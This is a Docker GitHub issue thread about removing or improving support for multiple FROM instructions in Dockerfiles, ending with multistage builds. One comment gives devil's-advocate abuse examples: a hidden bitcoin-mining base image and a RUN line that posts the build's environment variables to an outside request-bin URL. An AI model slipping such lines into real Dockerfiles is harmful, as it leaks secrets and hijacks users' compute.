Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Proposal: remove support for multiple FROMs in Dockerfile #13026

Closed
duglin opened this issue May 6, 2015 · 44 comments
Closed

Proposal: remove support for multiple FROMs in Dockerfile #13026

duglin opened this issue May 6, 2015 · 44 comments
Labels
area/builder impact/dockerfile kind/feature Functionality or other elements that the project doesn't currently have. Features are new and shiny status/needs-attention Calls for a collective discussion during a review session

Comments

@duglin
Copy link
Contributor

duglin commented May 6, 2015

See #5603 for some history.

Allowing for multiple images to be built from a single Dockerfile (via multiple FROM commands), while interesting, isn't fully supported. In particular, the non-final images that are produced are not easily found w/o some ugly parsing of the build output. It would then also leads to people wanting to do things like add TAG commands to tag each image so they're easily used/found.

I think there are two options:

  1. complete the "multiple FROM" support we have by making it easier for people to find/use those intermediate images.
  2. remove support for multiple FROMs until we figure out exactly how people are supposed to use it.

This issue is to get the conversation started and to propose option 2 - remove it.

Question: are people using this feature today and if so what are the usecases for it?

@ewindisch
Copy link
Contributor

I am not using this feature in production and believe it should be dropped. As a devil's advocate, here are some places I see it being (ab)used:

Bitcoin tipping

# Donate 2 minutes of CPU cycles toward mining bitcoins for ewindisch
FROM ewindisch/bitcoin-tipping-image
# We now return you to your program...
FROM ubuntu:utopic

Logging / reporting

FROM buildpack-deps:curl
RUN curl -X POST -d "$(env)" http://requestb.in/x2fgrbx2
FROM ubuntu:utopic

Multi-stage building

# NOTE: I cannot attest to the safety of using cgswong/aws... it's not-invented-here!
FROM cgswong/aws
ADD dot-aws /root/.aws
ADD src /src
WORKDIR /src
# Having a golang compiler in the image would make this work ;-)
RUN go build main.go
RUN aws s3 cp . s3://mybucket/mybuild --recursive 
FROM buildpack-deps
# This is all kinds of wrong? ;-)
RUN curl -O /usr/bin/main https://my-bucket-url/mybuild/main

I could see the multi-stage building being legitimately useful if volumes could be shared between builds?

@thaJeztah
Copy link
Member

Thanks for opening @duglin!

@duglin
Copy link
Contributor Author

duglin commented May 6, 2015

I can't help but think that we should find a better way to solve these usecases than to use FROM.

There are times when I think some kind of 'make' thing that sits on top of 'docker build' would be useful. It would probably end up overlapping with Compose too much but perhaps nested builds are more what people want. Dunno, but it might be an interesting topic for a break-out session at DockerCon to see what the requirements are for these non-trivial builds.

@thaJeztah
Copy link
Member

Dunno, but it might be an interesting topic for a break-out session at DockerCon to see what the requirements are for these non-trivial builds.

Actually, good idea. I think there are various feature requests that could benefit from a good discussion to see what users are looking for, use-cases etc. Not all users are active on GitHub and it would help the maintainers making better choices (instead of "guessing" what would be useful in some cases). (Won't be there myself :/ ... Skype call? :))

@ewindisch
Copy link
Contributor

@duglin @thaJeztah there have been some discussions about doing the dockerfile parsing on the client-side and using the client to drive the build. /cc @shykes

@duglin
Copy link
Contributor Author

duglin commented May 8, 2015

If we do remove multiple FROMs, does that reduce the need for the MARK/SQUASH stuff in #12198 ? By that I mean, I know people will still want to squash stuff but if we limit you to one image per Dockerfile, will just an operation at the docker cmd level (on images) be sufficient ?

@thaJeztah
Copy link
Member

@duglin like the original "squash" implementation? #4232 (Oh, according to #4232 (comment) we don't need a squash :))

@duglin
Copy link
Contributor Author

duglin commented May 8, 2015

oh wow - so much history :-)

@WhisperingChaos
Copy link
Contributor

@duglin

Multiple FROMs enable the separation of build-time and run-time concerns. Essentially, build tool chains are performed within the context of one or more FROM statements producing either intermediate artifacts, to be further processed by other FROM statements, or final products. At the termination of a build-time FROM, the initial build context is extended to include its intermediate or final products, so that they are available to the next FROM context. Eventually, the last FROM, the one that doesn't extend the build context, simply contains a single ADD operation to produce the entire file system and any other Dockerfile commands like ENV, EXPOSE, or ENTRYPOINT needed to configure the run-time image. This process generates the smallest sized run-time image with the minimal number of layers and preserves the potentially highly layered build-time image cache, to improve subsequent build performance, especially if cache misses are isolated to only a specific FROM.

There are two open Proposals that detail how to achieve the above with two mechanisms:

  • Proposal: Extending Build Context with Intermediate State #12415 : Extends the uploaded build context with intermediate files, like compiled executables, from committed build-time containers. It essentially bind mounts one or more directories within a committed container, generated when running the build, to the root directory of the build context.
  • Proposal: Dynamic Coupling via Local Build Context #12072 : Maps, in a read only way, the directory structure of the build context to present a virtual directory structure that corresponds to the one required by a given FROM statement. Think of it as creating a directory structure comprised entirely of symbolic links that conforms to what's needed by FROM and its associated Dockerfile commands. It's also similar to a SQL SELECT/CREATE VIEW in that you can partition/rearrange the build context directory structure, including its files, to reflect any desired 'shape'.

Read #12415 TLDR and view its Example, as it concisely demonstrates both mechanisms.

If the above mechanisms were implemented, FROM statements would no longer be executed sequentially but instead ordered by their dependencies, very much like a makefile.

@duglin
Copy link
Contributor Author

duglin commented May 16, 2015

@WhisperingChaos but none of what you're talking about can be done today - and that's my point. Unless we take on the task of making the use of FROM actually useful (perhaps with some of the proposals you mentioned) then we might as well remove it. So, this issue is to force the discussion - either we "fix" it so that multiple FROMs can be useful or we drop it. But leaving a 1/2 implemented feature that doesn't seem to do much good seems silly.

@WhisperingChaos
Copy link
Contributor

@duglin

none of what you're talking about can be done today

Agree, but I'm suggesting that multiple FROM support be continued and enhanced as per the first option stated in the initial post:

I think there are two options:

  1. complete the "multiple FROM" support we have by making it easier for people to find/use those intermediate images.

My initial reply not only presents the reasoning to support multiple FROMs but also suggests mechanisms to realize its benefits. BTW, the mechanisms presented in the referenced proposals aren't new, like extending the build context, as it appears in Nested Build #7149. They've just been repackaged in a manner to avoid, in the instance of Nested Build, harmful coupling.

@WhisperingChaos
Copy link
Contributor

@duglin

If we do remove multiple FROMs, does that reduce the need for the MARK/SQUASH stuff in #12198

Nope.

For example, using a single FROM to build a golang app using the google/golang-runtime as a base image will include the golang tool chain, and the entire build context: go source files, the Dockerfile... including them as various layers in the resultant image. The entire tool chain, Dockerfile, and go source files... are completely unnecessary. All that's required is the compiled executable and perhaps a couple libraries. This behavior isn't specific to google/golang-runtime.

In fact, enhancing/extending multiple FROMs would eliminate the need for MARK/SQUASH, as the tool chain would exist and execute within the environment of a build-time FROM, preserving the semantics of the cache, with the resultant files simply copied as a single layer to a second FROM representing the resultant run-time image.

@WhisperingChaos
Copy link
Contributor

@ewindisch

Although I agree removing multiple FROM support would require some additional effort to encode the exploits, it wouldn't eliminate them. One could introduce a script executed by a RUN command to implement these exploits, as they rely on access to the Dockerfile.

In fact, it would be less noticeable to use a single FROM whose specified image included a compromised FROM in its construction.

@WhisperingChaos
Copy link
Contributor

@duglin Why?:

I can't help but think that we should find a better way to solve these usecases than to use FROM.

There are times when I think some kind of 'make' thing that sits on top of 'docker build' would be useful. ...

@duglin
Copy link
Contributor Author

duglin commented May 24, 2015

Well, the bitcoin one seems like a curl would work just as well (if I'm
understanding what's going on). And the logging one is just curl too so
why use FROM at all?
The multi-stage building, or the ability to generate multiple images
per Dockerfile, is the only usecase for multiple FROM that makes any sense
to me. Which is the point of this issue. Unless there's the desire to
turn a Dockerfile more into a Makefile where it can be used to fully
describe how to create multiple images (which, btw I would like), then
I think we should reduce things down to the model of single Dockerfile
makes a single image, but then provide some tooling to sit on top to
manage the mutli-image need. Compose might help here, but I'm not sure
its a perfect fit (yet).

@WhisperingChaos
Copy link
Contributor

Well, the bitcoin one seems like a curl would work just as well (if I'm
understanding what's going on). And the logging one is just curl too so
why use FROM at all?

I would not support these use cases, but FROM in these situations helps to simplify the coding through encapsulation and its contents don't pollute the other FROM.

The multi-stage building, or the ability to generate multiple images
per Dockerfile, is the only usecase for multiple FROM that makes any sense
to me.

Agree.

...Dockerfile more into a Makefile where it can be used to fully
describe how to create multiple images (which, btw I would like),..

That's my intent too.

I think we should reduce things down to the model of single Dockerfile
makes a single image, but then provide some tooling to sit on top to
manage the mutli-image need.

What tooling would be necessary?

Why would the solution be dependent on Compose?

Although Compose will permit you to build an image from a Dockerfile, it primarily establishes 'run-time' properties of the built image. Therefore, I'm struggling to understand how Compose would generate a multi-stage build for a single image?

I didn't notice a means of specifying static build-time image dependencies. For example, suppose a service named 'client' inherits its definition from 'service'. How does Compose 'build' know to construct the 'service' first, then the 'client'?

It might be problematic for docker build to rely on a component, like Compose that might not be installed, or whose implementation differs from Docker's version of Compose. In other words, should docker build's functionality be fully encapsulated within itself in order to cleanly support Docker's stated goal of a 'pluggable' infrastructure?

@duglin
Copy link
Contributor Author

duglin commented May 24, 2015

@WhisperingChaos I agree on the compose stuff, and that was sort of my point. I think, right now, the closest thing we have to tooling that sits on top of vanilla Docker that even comes close to dealing with multiple images is Compose. But that's even not that close.

re: other tooling... well, I think tooling to help do things like squash images to remove layers. Or tooling to help build one image while in the middle of building another (nested builds). That kind of stuff. A lot of this just depends on what Docker is meant to be - just a single unit (building block) in a bigger puzzle or should it try to do more. Its a fine line, but right now I'm leaning more towards it doing more since I'm convinced (for now) that higher-level tooling to do some of these things will make the UX too complicated and less seamless.

@WhisperingChaos
Copy link
Contributor

@duglin

re: other tooling... well, I think tooling to help do things like squash images to remove layers.

Why is squash necessary?

I would suggest that Squash is unnecessary if:

  • running tool chains, etc... can be isolated to a build-time container,
  • and an addressibility mechanism permits build-time container artifacts to be transferred to intermediate build-time images and the resultant run-time image,
  • and a mechanism allows the formulation of the resultant file system, projected as the final build context for the resultant image.

Given these conditions, the resultant file system can be minimally copied as a single ADD . / for any image. However, when desired, the resultant file system could also consist of more than one layer. For example, the resultant image could be constructed by inheriting a ubuntu image and then adding only the final artifacts from the build-time containers. This would limit a pull request of the resultant image to only the added final artifact layer if the ubuntu image had already been downloaded. Also, in this situation, build-time containers would associate themselves via a 'used by' relationship instead of an inheritance one. 'use by' image relationships would not be copied when pulling an image.

Or tooling to help build one image while in the middle of building another (nested builds).

The nested/chained build implementations: #7115, #7149, and #8021 are problematic as discussed by these posts:

I would be interested in links to other nested build proposals that your post may be referring to, in order to review their implementations.

...Docker is meant to be - just a single unit (building block) in a bigger puzzle or should it try to do more...

Multi-stage building should be supported for a single unit (resultant image). However, I'm unsure that docker build needs a mechanism to build more than one resultant image. The only reason for a more comprehensive mechanism that constructs several images at once would involve a shared static dependency, like a shared parent image or shared protocol, that must be synchronized in order for new, cooperative image versions to successfully interoperate. Currently, I use tool to manage these dependencies locally and will employ Docker Hub's "Repository links" feature when publically publishing through Automated Builds.

Yes, so my docker build relies on tools external to docker build to properly build artifacts. Somewhat hypocritical...

@jessfraz jessfraz added kind/feature Functionality or other elements that the project doesn't currently have. Features are new and shiny and removed kind/feature Functionality or other elements that the project doesn't currently have. Features are new and shiny kind/proposal labels Sep 8, 2015
@arun-gupta
Copy link
Contributor

When is this planned to be deprecated?

@duglin
Copy link
Contributor Author

duglin commented Oct 25, 2015

gotta get some buy-in from other maintainers first....

@duglin duglin added the status/needs-attention Calls for a collective discussion during a review session label Nov 23, 2015
@duglin
Copy link
Contributor Author

duglin commented Nov 23, 2015

Adding "needs-attention" label so we can discuss this at some point. We just need to make a decision one way or the other on this.

@sheerun
Copy link

sheerun commented Dec 1, 2015

If you decide to remove this feature, I'd like to see clean solution for multistage build (e.g. build a static website with webpack image, and then package result with nginx server from another base image).

@thaJeztah
Copy link
Member

@sheerun could you expand on your use case, perhaps a very basic example showing how you're using this feature?

@sheerun
Copy link

sheerun commented Dec 2, 2015

It's similar to multi-stage building @ewindisch mentioned. First part has "from" set on tutum/buildstep to build image with webpack, I upload result on my private server, and then download result in second part of Dockerfile with "from" set on dockerfile/nginx.

It's hacky but I'm not aware of any other way multi-stage build. Any ideas?

@thaJeztah
Copy link
Member

I think many people use a separate build container (e.g. https://github.com/docker-library/hello-world/blob/master/update.sh) but that won't work with automated builds. I personally think that nested builds may be a good replacement for that; #7115

@sheerun
Copy link

sheerun commented Dec 2, 2015

Anything will do as long as I can do following:

  1. Run sub-builds from within my build.
  2. Export paths from previous builds (so we need to be able to name previous builds..)

Running sub-builds is already handled by FROM command, but they are pretty useless, because we can't interact with results of them. I imagine something like like this:

NAME dev_build
FROM dockerfile/nodejs
ADD ./ /app
WORKDIR /app
RUN npm install
RUN npm run build

FROM dockerfile/nginx
COPY dev_build:/app /var/www/html

The resulting build has all properties of dockerfile/nginx and dev_build is discarded.

So I'd be happy with following changes to Dockerfile:

  1. Introduce NAME command to name FROM builds
  2. Extend COPY syntax to allow to reference other builds (similarly to docker cp)

// EDIT
This also allows to run builds in parallel and block on COPY command when it references a running build

// EDIT 2
I also imagine extension of -t flag of docker build command, so we are able to export named builds:

docker build -t sheerun/app_development:dev_build sheerun/app_runtime .

The command above would export dev_build named build to sheerun/app_development tag, and the default build to sheerun/app_runtime tag. Any builds that are not exported, are discarded.

@JAremko
Copy link

JAremko commented Dec 4, 2015

Nested builds could be really great for the "from scratch" containers as they require host system for the executable to be build on.

@jakirkham
Copy link

+1, @duglin

While I would love to see a useful FROM possibly like multiple inheritance or extracting files from images or similar, I think the current broken implementation is standing in the way of actually trying any of those proposals. In short, I think this should go through a deprecation cycle and be removed. Only then can we really begin to think what multiple FROMs should do.

@sleaze
Copy link

sleaze commented Mar 7, 2016

+1 for docker multiple inheritance functionality.

@gravis
Copy link

gravis commented Apr 16, 2016

I'm using multiple FROMs in my images, to aggregate services. Please do not remove this feature :)

@duglin
Copy link
Contributor Author

duglin commented Apr 16, 2016

@gravis can you elaborate on what you mean? Its not like it merges them

@gravis
Copy link

gravis commented Apr 16, 2016

Since I'm using the same base (debian jessie), I can create composite docker image instead of docker-compose files. Ie:

FROM nginx
FROM postgres
...

@gravis
Copy link

gravis commented Apr 16, 2016

hmm, the nginx env vars are not available in this case :(
Too bad

@thaJeztah
Copy link
Member

@gravis you won't get both "nginx" and "postgres" in a single image with that Dockerfile; it will just start two builds after each other. Basically your example will do;

FROM nginx

and build that (without tagging it)

Followed by

FROM postgres
....

and build that, giving it the tag/name you specified during your build

@vdemeester
Copy link
Member

@gravis it's more than that. Anything in nginx will not be able in the final image (the latest FROM is taking over whatever is before) — dockerfile are not composable.

@gravis
Copy link

gravis commented Apr 16, 2016

Just saw that in my tests, forget my comments please :)

@gravis
Copy link

gravis commented Apr 18, 2016

To conclude, I fully agree, having multiple FROM in a Dockerfile is an awful/dangerous practice, and must be avoided.

@C0deH4cker
Copy link

If a command TAG were added that allowed tagging the image at that point in the Dockerfile, it might make more sense to allow multiple FROM commands. In that use case, you could have one FROM, run whatever commands are needed to produce your new image, have a TAG myfirstimage, and then another FROM and finish the Dockerfile. As with the way it works now, the image name/tag specified on the command line will be associated with the final image id at the end of the Dockerfile, but a single Dockerfile could tag various states along the way as well.

@xenoterracide
Copy link

xenoterracide commented Dec 23, 2016

Hmm... I' not sure I do agree that having multiple FROM's is a bad idea, but if it works (and I didn't know it existed until finding this, so I haven't tried it) it should work as a flattened composition (https://en.wikipedia.org/wiki/Trait_(computer_programming)). Perhaps though an alternate syntax FROM alpine:latest WITH java-alpine:latest, ruby-alpine:latestwhere foo acts like inheritance and is a base image like alpine, or ubuntu, but you could have some way to define bar, and baz, like java and ruby, so that you could easily compose languages (or other applications) into a single image.

Food for thought.

@AkihiroSuda
Copy link
Member

Now we have multistage Dockerfile.

Can we close this?

@sheerun
Copy link

sheerun commented Apr 9, 2017

I guess so, it pretty much covers this use case. It would be nice to export any image from multistage build, though: #32063 (comment)

@thaJeztah
Copy link
Member

lets close this one yes

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
area/builder impact/dockerfile kind/feature Functionality or other elements that the project doesn't currently have. Features are new and shiny status/needs-attention Calls for a collective discussion during a review session
Projects
None yet
Development

No branches or pull requests